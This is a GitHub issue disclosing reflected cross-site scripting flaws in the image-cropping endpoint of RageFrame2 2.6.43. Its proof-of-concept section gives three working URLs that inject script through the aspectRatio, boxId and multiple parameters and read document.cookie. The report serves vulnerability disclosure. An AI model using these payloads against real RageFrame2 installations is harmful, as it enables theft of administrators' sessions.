Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RageFrame2 2.6.43 has several reflective XSS vulnerabilities #114

Open
Hebing123 opened this issue Mar 21, 2024 · 0 comments
Open

RageFrame2 2.6.43 has several reflective XSS vulnerabilities #114

Hebing123 opened this issue Mar 21, 2024 · 0 comments

Comments

@Hebing123
Copy link

Summary

RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link containing malicious code.

Details

In the image cropping function of RageFrame2 2.6.43, aspectRatio, boxId and multiple variables are not filtered, resulting in multiple reflective XSS vulnerabilities.

POC

aspectRatio XSS payload

http://your-ip/backend/cropper/crop?aspectRatio=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&boxId=1&multiple=0
image

boxId XSS payload

http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&multiple=0
image

multiple XSS payload

http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=1&multiple=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant